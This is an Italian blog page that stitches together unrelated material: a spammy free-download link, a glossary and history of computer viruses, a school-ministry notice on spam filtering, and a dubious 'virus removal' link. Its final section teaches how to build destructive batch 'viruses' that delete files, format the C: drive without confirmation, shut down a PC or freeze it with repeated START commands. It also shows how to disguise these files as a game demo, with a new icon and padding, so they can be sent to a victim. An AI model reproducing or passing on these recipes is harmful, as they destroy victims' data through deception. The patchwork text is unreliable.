cazzate

Per AVERE/SCARICARE tutti i nuovi giochi, programmi, film, musica ecc. andate su questo link : http://insanezone.ro/pingui66-22458.html     
è incredibile questo sito!

Innanzitutto iniziamo subito col dire che il termine Virus è un spesso abusato. Purtroppo è la stessa cosa che è accaduta con il termine “hacker” ormai entrato nell’uso comune nell’accezione di cracker.

Nel linguaggio comune, difatti, molti utilizzano il termine Virus per indicare, in realtà, una vastità di elementi nocivi che, invece, dovrebbero essere identificati dal termine Malware (Malicios Software ovvero Software Nocivo) o Badware…

Questo “malware” altro non è che un programma (o parte di esso) che “fa un qualcosa che se lo sapessimo non glielo lasceremmo fare”, come sono solito definirlo io.

Questo “qualcosa” può andare dalla semplice raccolta di informazioni al reindirizzamento delle pagine web visitate,  dallo sfruttamento della nostra connessione allo sfruttamento del nostro processore, dall’invio automatico di spam dal nostro computer al download di altro software nocivo: insomma, niente di gradevole.

Come si classifica il Malware?

A seconda della funzione, del modus operandi, della struttura del codice utilizzato il Malware può essere classificato in diverse categorie:

• Virus
• Worm
• Trojan Horse
• Rootkit
• Backdoor
• Keyogger
• Botnet
• Dialer
• AdWare
• Spyware
• Downloader
• Exploit
• Spam
• Hoax

Vi sono poi altre categorie minori comei Rogue Software (mai sentito parlare del famigerato Antivirus 2009?).

Pertanto andiamo a definire cosa sono e cosa fanno questi “simpatici” ospiti una volta che si sono insediati nel nostro sistema.

Definizioni

VIRUS

Un Virus propriamente detto ha la capacità di copiare se stesso su un computer senza la consapevolezza dell’utente.

Un virus propriamente detto ha la sola capacitò di copiarsi da un computer all’altro in forma di codice eseguibile (per esempio attraverso l’uso di drive USB, CD/DVD o altri supporti, via Internet o una rete LAN) e attacca un altro programma copiando in quest’ultimo il proprio codice malevolo.

WORM

Il Worm (verme) è simile al virus ed ha anch’esso la capacità di diffondersi in una rete senza l’intervento o la consapevolezza dell’utente, ma non si include nel codice di altri programmi essendo egli stesso un programma eseguibile.

Tendenzialmente arreca danni ad una rete (consumo di banda, packet collision etc) e non ai file del computer come invece fa un Virus.

TROJAN HORSE (o semplicemente Trojan)

La parola stessa (Cavallo di Troia) dà già un’idea di cosa sia un Trojan: un programma che promette una cosa (gradevole, desiderabile) e ne fà un’altra (sgradevole, non desiderabile).

Generalmente vengono volontariamente scaricati da Internet consapevolmente da un utente ignaro del fine ultimo dell’applicazione che può andare dalla distruzione di dati ad un attacco DoS (Denial of Service).

In genere ha un nome accattivante e/o innocuo:

screensaver.exe - sex.exe - telefonogratis.exe - downloadWindowsMediaPlayer.exe

ROOTKIT

Non mi dilungherò nella spiegazione dell’origine del nome per la quale rimando alla lettura di questo articolo.

Un rootkit è un malware (le categorie di cui sopra non sono esclusive) con la capacità di nascondersi completamente al sistema (impossibile trovare i files di cui è composto, i processi, le chiavi di registro etc..).

BACKDOOR

Una Backdoor (porta sul retro) indica un accesso sicuro ha chi ha già effettuato un attacco verso un obiettivo (il nostro computer, purtroppo).

Una volta aperta questa porta (può trattarsi di un programma come di una vulnerabilità intrinseca del sistema o di un sofware) l’attaccante si trova sempre la porta aperta per tornarci e fare altri “danni”.

BOTNET

Una botnet è una rete di computer (detti zombie) controllata da un signolo utente remoto.

Viene sfruttata per attaccare altri sistemi attraverso uno dei nodi della botnet pertanto sul sistema attaccato l’attacco viene rilevato come eseguito da uno di questi (ignari) nodi.

KEYLOGGER

Un keylogger è un programma in grado di intercettare le combinazioni di tasti premuti per ricostruire la digitazione dell’utente ed inviarla ad un utente remoto o salvarla in locale per una successiva consultazione.

Esistono anche keylogger hardware.

DIALER

Un dialer crea, ad insaputa dell’utente,  una nuova connessione tramite linea telefonica o ISDN e compone, in genere, numeri a tariffazione che fanno lievitare la bolletta telefonica.

Con la diffusione delle connessioni DSL stanno via via scomparendo.

ADWARE

Con il termine Adware si vanno ad indicare tutti quei software che visualizzano, scricano o riproducono messaggi pubblicitari.

Vengono considerati nocivi in quanto molti di essi sono anche Spyware.

I messaggi pubblicitari, tuttavia, sono utilizzati dagli sviluppatori per mantenere i costi di produzione del software. I più famosi programmi Adware sono:  eMule_Adunanza, Eudora, Daemon Tools, RealPlayer e Messenger Plus! Live.

SPYWARE

Si identificano con questo termine tutti i programmi che raccolgono informazioni su usi, abitudini e dati dell’utente senza il suo consenso e le trasmette attraverso Internet.

I più famosi softwar Spyware sono costituiti da Zango search assistant e SonicMail

DOWNLOADER

Come già accennato rientrano nella categoria dei Downloader tutti quei programmi che effettuano il download di altro malware sul computer bersaglio.

EXPLOIT

Con il termine Exploit si indica un programma (o parte di esso), un insieme di dati, un particolare invio di pacchetti via Internet o una sequenza di comandi in grado di sfruttare una vulnerabilità di un sistema bersaglio o di un software in esso installato.

Nel Dicembre 2005 fu scovata una vulnerabilità nei Windows Metafile che permetteva l’attacco con il semplice inserimento di una clipart in questo formato all’interno di un’email; non era necessario che l’utente aprisse od eseguisse alcun contenuto: la semplice visualizzazione dell’anteprima dell’email in questione causava l’exploit installando nel sistema bersaglio un Trojan.

SPAM

Lo Spam è la cosiddetta “posta indesiderata”. Può contenere altri tipi di Malware.

HOAX

Si tratta della cosiddetta “Bufala” ovvero di un’informazione falsa che tenta di trarre in inganno con aspetti di verosomiglianza a fatti o cose reali e tende a gettare nella confusione chi riceve l’informazione.

Io stesso ho ricevuto la famosa email secondo la quale MSN Messenger sarebbe diventato “a pagamento” da uno dei miei contatti (che ho tempestivamente informato e redarguito)!

Conclusioni

Ho tentato di rendere questa carrellata di definizioni il più accessibile possibile a chi di informatica e sicurezza ne sa ben poco sperando di far chiarezza su alcuni aspetti poco noti.

Per eliminare qualsiasi virus dal vostro PC con il portale MSN potete scaricare il seguente programma dal sito _ : http://www.ptkweb.it/msn/windows_live_messenger/tag/creare-virus-live-messenger/

SICUREZZA INFORMATICA: LINK UTILI

Informazioni su virus ed epidemie:

http://www.sophos.com/security/top-10/

http://www.mcafee.com/us/threat_center/default.asp

http://vil.nai.com/vil/newly_discovered_viruses.aspx

http://it.trendmicro-europe.com/

http://www.symantec.com/avcenter/home_homeoffice/index.html

Informazioni su hoax (falsi virus):

http://www.symantec.com/avcenter/hoax.html

http://www.sophos.com/security/hoaxes/

Informazioni su security alert:

http://www.cert.org/

http://idea.sec.dsi.unimi.it/bullettins.it.html

http://www.sophos.com/security/analyses/

Informazioni su spam:

http://www.spamcop.net/

Gestione e filtraggio della posta indesiderata (SPAM) previste dal servizio di Posta

Elettronica del Ministero della Pubblica Istruzione.

Con il termine SPAM sono definite le e-mail non richieste e non desiderate con contenuto spesso di

propaganda commerciale e talvolta illegale o osceno.

La diffusione della posta indesiderata ha assunto recentemente dimensioni estremamente

significative che causano disagi agli utenti dei servizi di posta elettronica..

Per impedire allo spam di raggiungere tout-court le caselle di posta elettronica degli utenti finali,

l’Amministrazione ha richiesto che l’infrastruttura prevedesse l’uso di programmi per l’analisi

automatica delle mail ed il filtraggio in base a regole interne. Il risultato dell’analisi del messaggio

di posta assegna un punteggio a ciascuna mail: più è alto questo punteggio, maggiore è la

probabilità che la mail sia di spam.

Se il punteggio ottenuto supera un certo valore, la mail viene marcata come SPAM: viene

modificato l'oggetto della mail aggiungendo le diciture '*** SPAM ***' oppure '*** HIGH SPAM

***' prima dell'oggetto originale e inserita nella cartella SPAM sul server di posta, invece che nella

cartella della posta in arrivo. Si noti che solo i messaggi che sul server sono presenti nella casella di

posta in arrivo vengono scaricati in locale sul PC quando si accede utilizzando i comuni programmi

client (Outlook, Outlook Express, Eudora o altri).

Si osservi però che, siccome l’analisi automatica dei messaggi di posta per l’individuazione di

quella indesiderata fa riferimento al contenuto degli stessi, non è possibile distinguere con assoluta

certezza una mail di SPAM da altre mail assolutamente legittime. Può capitare quindi che dette

procedure falliscano e qualche mail di spam passi nella cartella della posta in arrivo (falsi negativi)

o, viceversa, qualche mail legittima venga identificata come spam e inserita nella cartella SPAM

(falsi positivi).

Per questo motivo, l'utente è invitato a esaminare periodicamente la cartella di SPAM sul.

server accedendo alla propria casella di posta mediante browser web e a verificare che non vi

siano mail legittime

Periodicamente si verificano invii massicci di spam: può succedere pertanto che lo spazio a

disposizione dell'utente si esaurisca perché arrivano molte mail di spam. Per questo motivo è buona

abitudine anche cancellare definitivamente le mail di spam.

Sono previste inoltre, per ottimizzare l’uso dei sistemi di posta, procedure di svuotamento

automatico dei messaggi presenti nel “Cestino” e/o nella cartella di “Posta Indesiderata” sul server

di posta; le procedure sono specifiche per ogni tipologia di utenza. Le caratteristiche di tali

procedure, sono riportate nei Manuali Utente on line disponibili all’utenza accedendo al servizio di

Posta Elettronica dal sito del internet del Ministero della Pubblica Istruzione

http://www.pubblica.istruzione.it

Nell'ambito dell'informatica un virus è un software, appartenente alla categoria dei malware, che è in grado, una volta eseguito, di infettare dei file in modo da riprodursi facendo copie di sé stesso, generalmente senza farsi rilevare dall'utente. I virus possono essere o non essere direttamente dannosi per il sistema operativo che li ospita, ma anche nel caso migliore comportano un certo spreco di risorse in termini di RAM, CPU e spazio sul disco fisso. Come regola generale si assume che un virus possa danneggiare direttamente solo il software della macchina che lo ospita, anche se esso può indirettamente provocare danni anche all'hardware, ad esempio causando il surriscaldamento della CPU mediante overclocking, oppure fermando la ventola di raffreddamento.

Nell'uso comune il termine virus viene frequentemente ed impropriamente usato come sinonimo di malware, indicando quindi di volta in volta anche categorie di "infestanti" diverse, come ad esempio worm, trojan o dialer.

Coloro che creano virus sono detti virus writer.
Ciclo di vita di un virus

I virus informatici presentano numerose analogie con quelli biologici per quello che riguarda il ciclo di vita, che si articola nelle fasi seguenti:

• creazione: è la fase in cui lo sviluppatore progetta, programma e diffonde il virus. Di solito i cracker per la realizzazione di virus utilizzano linguaggi di programmazione a basso livello (quali l'assembler e il C) in modo da ottenere codice virale di pochi centinaia di byte. La diffusione di pacchetti software che permettono anche ad utenti inesperti di creare virus pericolosissimi ha reso accessibile il procedimento di creazione anche a persone senza competenze.
• incubazione: il virus è presente sul computer da colpire ma non compie alcuna attività. Rimane inerte fino a quando non si verificano le condizioni per la sua attivazione;
• infezione: il virus infetta il file e di conseguenza il sistema
• attivazione: al verificarsi delle condizioni prestabilite dal cracker, il virus inizia l'azione dannosa.
• propagazione: il virus propaga l'infezione, riproducendosi e infettando sia file nella stessa macchina che altri sistemi
• riconoscimento: il virus viene riconosciuto come tale e viene individuata la stringa di riconoscimento, ossia la firma che contraddistingue ciascun virus
• estirpazione: è l'ultima fase del ciclo vitale del virus. Il virus viene eliminato dal sistema.
  Cosa è un virus e dove si trova
  

  Un virus è composto da un insieme di istruzioni, come qualsiasi altro programma per computer. È solitamente composto da un numero molto ridotto di istruzioni, (da pochi byte ad alcuni kilobyte), ed è specializzato per eseguire soltanto poche e semplici operazioni e ottimizzato per impiegare il minor numero di risorse, in modo da rendersi il più possibile invisibile. Caratteristica principale di un virus è quella di riprodursi e quindi diffondersi nel computer ogni volta che viene aperto il file infetto.

  Tuttavia, un virus di per sé non è un programma eseguibile, così come un virus biologico non è di per sé una forma di vita. Un virus, per essere attivato, deve infettare un programma ospite, o una sequenza di codice che viene lanciata automaticamente, come ad esempio nel caso dei boot sector virus. La tecnica solitamente usata dai virus è quella di infettare i file eseguibili: il virus inserisce una copia di sé stesso nel file eseguibile che deve infettare, pone tra le prime istruzioni di tale eseguibile un'istruzione di salto alla prima linea della sua copia ed alla fine di essa mette un altro salto all'inizio dell'esecuzione del programma. In questo modo quando un utente lancia un programma infettato viene dapprima impercettibilmente eseguito il virus, e poi il programma. L'utente vede l'esecuzione del programma e non si accorge che il virus è ora in esecuzione in memoria e sta compiendo le varie operazioni contenute nel suo codice.

  Principalmente un virus esegue copie di sé stesso spargendo l'epidemia, ma può avere anche altri compiti molto più dannosi (cancellare o rovinare dei file, formattare l'hard disk, aprire delle backdoor, far apparire messaggi, disegni o modificare l'aspetto del video, ...).
  

  Nel 1949 John von Neumann dimostrò matematicamente la possibilità di costruire un programma per computer in grado di replicarsi autonomamente. Il concetto di programma auto-replicante trovò la sua evoluzione pratica nei primi anni 60 nel gioco ideato da un gruppo di programmatori dei Bell Laboratories della AT&T chiamato "Core Wars", nel quale più programmi si dovevano sconfiggere sovrascrivendosi a vicenda. Era l'inizio della storia dei virus informatici.

  Il termine "virus" venne usato la prima volta da Fred Cohen (1984) della University of Southern California nel suo scritto Experiments with Computer Viruses (Esperimenti con i virus per computer), dove egli indicò Leonard Adleman come colui che aveva coniato tale termine. La definizione di virus, era la seguente: "Un virus informatico è un programma che ricorsivamente ed esplicitamente copia una versione possibilmente evoluta di sé stesso".^[3].

  Nel 1972 David Gerrold scrisse un romanzo di fantascienza La macchina di D.I.O. (When H.A.R.L.I.E. was One), dove è presente una descrizione di un programma per computer chiamato "VIRUS" che fa esattamente le stesse cose di un virus. Nel 1975 John Brunner scrisse il romanzo Codice 4GH (The Shockwave Rider) in cui sono descritti programmi chiamati "tapeworms" che si infiltrano nella rete con lo scopo di cancellare tutti i dati. Nel 1973 la frase "virus del computer" era stata usata nel film Il mondo dei robot (Westworld). Il termine "virus del computer" con il significato corrente è inoltre presente anche nell'albo a fumetti "Uncanny X-Men" n. 158, pubblicato nel 1982. Si può dunque affermare che Cohen fece per primo uso della parola virus solo in campo accademico, dato che questa era già presente nella lingua parlata.

  Un programma chiamato "Elk Cloner" è accreditato come il primo virus per computer apparso al mondo. Fu creato nel 1982 da Rich Skrenta sul DOS 3.3 della Apple e l'infezione era propagata con lo scambio di floppy disk. Nel corso degli anni ottanta e nei primi anni novanta fu lo scambio dei floppy la modalità prevalente del contagio da virus informatici. Dalla metà degli anni novanta, invece, con la diffusione di internet, i virus e i malware in generale iniziarono a diffondersi assai più velocemente, usando la rete e lo scambio di e-mail come fonte per nuove infezioni. Il bersaglio preferito di questi software sono prevalentemente le varie versioni di Windows.

  Il primo virus informatico famoso nel mondo venne creato nel 1986 da due fratelli pakistani proprietari di un negozio di computer per punire chi copiava illegalmente il loro software. Il virus si chiamava Brain, si diffuse in tutto il mondo, e fu il primo esempio di virus che infettava il settore di avvio. ^[4]

  Il primo file infector apparve nel 1987. Si chiamava Lehigh e infettava solo il file Command.com. Nel 1988 Robert Morris Jr. creò il primo worm della storia. L'anno seguente, nel 1989, fecero la loro comparsa i primi virus polimorfi, con uno dei più famosi: Vienna, e venne diffuso il trojan AIDS (conosciuto anche come Cyborg), molto simile al trojan dei nostri giorni chiamato PGPCoder. Entrambi infatti codificano i dati del disco fisso chiedendo poi un riscatto all'utente per poter recuperare il tutto. ^[5]

  Nel 1995 il primo macro virus, virus scritti nel linguaggio di scripting di programmi di Microsoft come MS-Word ed Outlook che infettano soprattutto le varie versioni dei programmi Microsoft attraverso lo scambio di documenti. Concept fu il primo macro virus della storia. Nel 1998 la nascita di un altro dei virus storici, Chernobyl o CIH,famoso perchè sovrascriveva il BIOS della scheda madre e la tabella delle partizioni dell'hard disk infettato ogni 26 del mese.

  La diffusione di massa di Internet nella fine degli anni 90 determina la modifica delle tecniche di propagazione virale: non più floppy ma worm che si diffondono via e-mail. Tra i worm di maggior spicco antecedenti al 2000: Melissa, Happy99 e BubbleBoy, il primo worm capace di sfruttare una falla di Internet Explorer e di autoeseguirsi da Outlook Express senza bisogno di aprire l'allegato.^[6] Nel 2000 il famoso I Love You che dà il via al periodo degli script virus, i più insidiosi tra i virus diffusi attraverso la posta elettronica perché sfruttano la possibilità, offerta da diversi programmi come Outlook e Outlook Express di eseguire istruzioni attive (dette script), contenute nei messaggi di posta elettronica scritti in HTML per svolgere azioni potenzialmente pericolose sul computer del destinatario. I virus realizzati con gli script sono i più pericolosi perché possono attivarsi da soli appena il messaggio viene aperto per la lettura. I Love You si diffuse attraverso la posta elettronica in milioni di computer di tutto il mondo, al punto che per l'arresto del suo creatore, un ragazzo delle Filippine, dovette intervenire una squadra speciale dell’FBI. Era un messaggio di posta elettronica contenente un piccolo programma che istruiva il computer a rimandare il messaggio appena arrivato a tutti gli indirizzi contenuti nella rubrica della vittima, in questo modo generando una specie di catena di Sant’Antonio automatica che alla fine mandava in tilt i server di posta. ^[7]

  Dal 2001 un incremento di worm che per diffondersi approfittano di falle di programmi o sistemi operativi senza bisogno dell'intervento dell'utente. L'apice nel 2003 e nel 2004: SQL/Slammer, il più rapido worm della storia - in quindici minuti dopo il primo attacco Slammer aveva già fatto infettato metà dei server che tenevano in piedi internet mandando in tilt i bancomat della Bank of America, spegnendo il servizio di emergenza 911 a Seattle e provocando la cancellazione per continui inspiegabili errori nei servizi di biglietteria e check-in ^[8]; e i due worm più famosi della storia: Blaster e Sasser.^[9]

  Ogni sistema operativo che permette l'esecuzione di programmi scritti da terzi è un potenziale sistema attaccabile da virus, però bisogna anche riconoscere che ci sono sistemi operativi meno sicuri di altri. I sistemi operativi della Microsoft sono i più colpiti dai virus (anche a causa della loro diffusione tra un pubblico di 'non addetti ai lavori'), ma esistono virus sperimentali anche per altre piattaforme. Sui sistemi basati sul progetto GNU (GNU/Linux, GNU/Hurd, BSD, ...) e su Mac OS X la diffusione di un virus è molto improbabile se il sistema è gestito correttamente dal proprietario; inoltre, su questi sistemi un virus molto difficilmente può riuscire a causare danni al sistema operativo.

  Ciò che distingue i virus propriamente detti dai worm è la modalità di replicazione e di diffusione: un virus è un frammento di codice che non può essere eseguito separatamente da un programma ospite, mentre un worm è un applicativo a sé stante. Inoltre, alcuni worm sfruttano per diffondersi delle vulnerabilità di sicurezza, e non dipendono quindi dal fatto di ingannare l'utente per farsi eseguire.

  Prima della diffusione su larga scala delle connessioni ad Internet, il mezzo prevalente di diffusione dei virus da una macchina ad un'altra era lo scambio di floppy disk contenenti file infetti o un virus di boot. Il veicolo preferenziale di infezione è invece oggi rappresentato dalle comunicazioni e-mail e dalle reti di peer to peer (ad esempio eMule).

  Nei sistemi informatici Windows è di consuetudine usare il registro di sistema per inserire in chiavi opportune dei nuovi programmi creati ad hoc dal programmatore di virus che partono automaticamente all'avvio. Uno dei punti deboli del sistema Windows è proprio il suo registro di configurazione. Esistono vari programmi per tenere d'occhio le chiavi pericolose del registro di Windows, uno di questi è Absolute Startup, che ad intervalli di tempo regolari esegue una scansione delle zone a rischio del registro per vedere se un nuovo virus o programma anomalo è stato aggiunto in quelle chiavi.

  Per poter comprendere meglio lo sviluppo dei virus informatici, dobbiamo tornare indietro nel tempo, precisamente intorno ai primi anni 80, quando venne coniato il termine "virus informatico" da Fred Cohen. Sebbene sia considerato all'unanimità questo il periodo ufficiale che sancisce la nascita dei virus informatici, dobbiamo precisare che concetti simili erano stati comunque studiati negli anni precedenti.

  Per arrivare al primo virus informatico famoso nel mondo dobbiamo giungere al 1986, dove due fratelli pakistani, proprietari di un negozio di computer, creano il virus Brain per punire chi copiava illegalmente il loro software. Brain si diffonde in tutto il mondo, anche se in molto più tempo rispetto a quello a cui siamo abituati noi oggi. Fu il primo esempio di virus che infettava il settore di avvio.

  Per poter vedere all'opera il primo file infector dobbiamo aspettare il 1987, quando il virus Lehigh fa la sua comparsa. Lehigh fu il primo virus che infettava i file - nel suo specifico caso solo il file "Command.com".

  Nel 1988 Robert Morris Jr. crea il primo worm della storia, sfruttando alcune falle di programmi e liste di password non sicure utilizzate da molti gestori di servizi. Solo un anno dopo, nel 1989, vediamo l'avvento dei primi virus polimorfi, con uno dei più famosi: Vienna. Nello stesso anno viene diffuso il trojan AIDS (conosciuto anche come Cyborg), molto simile ad un trojan dei nostri giorni, PGPCoder.Entrambi infatti codificano i dati presenti nel disco fisso e chiedono un riscatto per poter recuperare il tutto.

  Dal 1989 c'è un rapido sviluppo di queste tipologie di virus ma per assistere al primo grande salto dobbiamo arrivare nel 1995, quando Concept, il primo virus veramente diffuso, introduce il concetto di macro virus, cioè virus che infettano i documenti di Microsoft Office. Nel 1998 vediamo la nascita di un altro dei virus storici, Chernobyl o CIH, diventato famoso per la capacità di sovrascrivere il BIOS della scheda madre e la tabella delle partizioni dell'hard disk ogni 26 del mese.

  La fine degli anni 90 vede la diffusione di massa di Internet per come è intesa al giorno d'oggi, e molti virus writers videro che non era più necessario aspettare mesi e mesi affinché un floppy disk infetto potesse infettare il mondo intero: Internet collegava il mondo intero e il tutto a pochi secondi di distanza. Inizia a nascere quindi il periodo dei worm che si diffondono via e-mail, tutt'ora vivo. Tra i nomi di maggior spicco prima del 2000 possiamo ricordare Melissa, Happy99 e BubbleBoy, il primo worm capace di sfruttare una falla di Internet Explorer e di autoeseguirsi da Outlook Express senza bisogno di aprire l'allegato.

   

  Il 2000 viene ricordato come l'anno dell'amore, con il famoso I Love You che, a catena,a dà il via ad un breve periodo di script virus. Dal 2001 vediamo un incremento di worm che utilizzano falle di programmi o sistemi operativi per diffondersi senza nessun intervento dell'utente, fino a raggiungere l'apice nel 2003 e nel 2004: SQL/Slammer, il più rapido worm della storia e i due worm che tanto hanno fatto parlare di sé: Blaster e Sasser.

  

Creare un virus in batch

Salvare Un Virus
1) Aprire il blocco note
2) Incollarci il codice
3) Chiudere e salvare il file in .bat


Virus Per Cancellare Un File
1) Aprite il blocco note
2) Incollateci 1 dei seguenti codici:


CODICE
@ERASE /comando "C:\percorso\percorso *.*"
@DEL /comando "C:\percorso\percorso *.*"

3) Chiudete e salvate in .bat


IN DETTAGLIO: Che significa quel codice?
Allora:
1) @ERASE e @DEL = Sono per cancellare file
2) /comando = Bisognerebbe inserire 1 o più comandi tra questi:

a) /P Chiede conferma prima di eliminare ogni file.
b) /F Forza l'eliminazione dei file di sola lettura.
c) /S Elimina i file specificati da tutte le sottodirectory.
d) /Q Modalità silenziosa, non chiede conferma per eliminazioni globali.
e) /A Seleziona i file da eliminare in base agli attributi.

3) *.* = Il PRIMO asterisco serve per cancellare TUTTI i file con un certo nome, come:
CODICE
eversor.*

4) *.* = Il SECONDO asterisco serve per cancellare QUALSIASI tipo di ESTENSIONE di un file, come:
CODICE
*.txt


5) QUINDI, in sostanza se dobbiamo cancellare il file "eversor" in .txt sul desktop, faremo:

CODICE
@ERASE /S /Q "C:\Programmi\Documents and settings\L.H.S.\Desktop\eversor.txt"



Virus Per Formattare C:
1) Aprire il blocco note
2) Inserirce dentro il seguente codice:

CODICE
format C: /autotest /q /u

3) Salvare in .bat

IN DETTAGLIO: Questo virus formatta c: senza chiedere conferma (/q) e non permette di essere bloccata piu avanti (/u)


Virus Per Disconnettere/Riavviare/Spegnere il PC
1) Aprire il blocco note
2) Inserire dentro il seguente codice:

CODICE
shutdown -comando

3) Salvare in .bat

IN DETTAGLIO: Il -comando può essere sostituito tra i seguenti:

a) -i : Attiva l’interfaccia utente grafica
b) -l : Disconnette l'utente
c) -r : Riavvia il PC
d) -s : Spegne il computer
e) -t xx: xx Sarebbero i secondi di attesa prima della chiusura di Windows
f) -f : Chiude le applicazioni ancora aperte


Virus Per Far Impallare Il PC
1) Aprire il blocco note
2) Inserire dentro il seguente codice:
START
START
START
START
START
START
START
START
ecc...
3) Salvare in .bat

IN DETTAGLIO: Se aprite l'msdos (Start--->Esegui--->cmd) e scrivete START, a sua volta vi apre di nuovo il prompt.
Che succede se voi scrivete START tipo 500 volte (MAGARI COL NOSTRO FLODDER SPECIALE) salvate in batch e lo mandate alla vittima???
Beh, vi lascio a voi immaginare.


Trasformare Il .bat In .exe
1) Scaricate il seguente programma: Batch To Exe 1.2
2) Apritelo e scegliete le opzioni, si può anche cambiare l'icona del file


Aumentare Il Peso Del Virus
1) Aprire il blocco note
2) Incollarci dentro il codice
3) Aggiungere il codice:

CODICE
@REM parole_a_caso_ma_tante

4) Salvare in .bat

IN DETTAGLIO: Perchè @REM?
Allora si da il caso che il comando @REM, serva per "Inserire Commenti", MA, se noi al posto dei commenti mettiamo non so, 500 volte la lettere aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, non faremo altro che AUMENTARE il peso del virus.
Perchè così?
Sicuramente CHIUNQUE abbia un MINIMO di conoscenza informatica, si può accorgere che la demo del gioco Need For Speed Underground 4, che gli passiamo in anteprima, NON PUò PESARE 2KB!!!!
Quindi c'è il comando @REM, che non modifica ASSOLUTAMENTE il codice, ma fa si che esso, PESI DI PIù, e le nostre probabilità di fregare la vittima aumentano sempre più

Questo è il primo articolo del tuo blog. È stato creato automaticamente per aiutarti ad iniziare su overblog. Puoi modificarlo o eliminarlo attraverso la sezione "pubblica" dell'amministrazione del tuo blog.

Buon blogging

L'équipe di overblog

PS : per collegarti alla tua amministrazione appuntamento sul portale blog overblog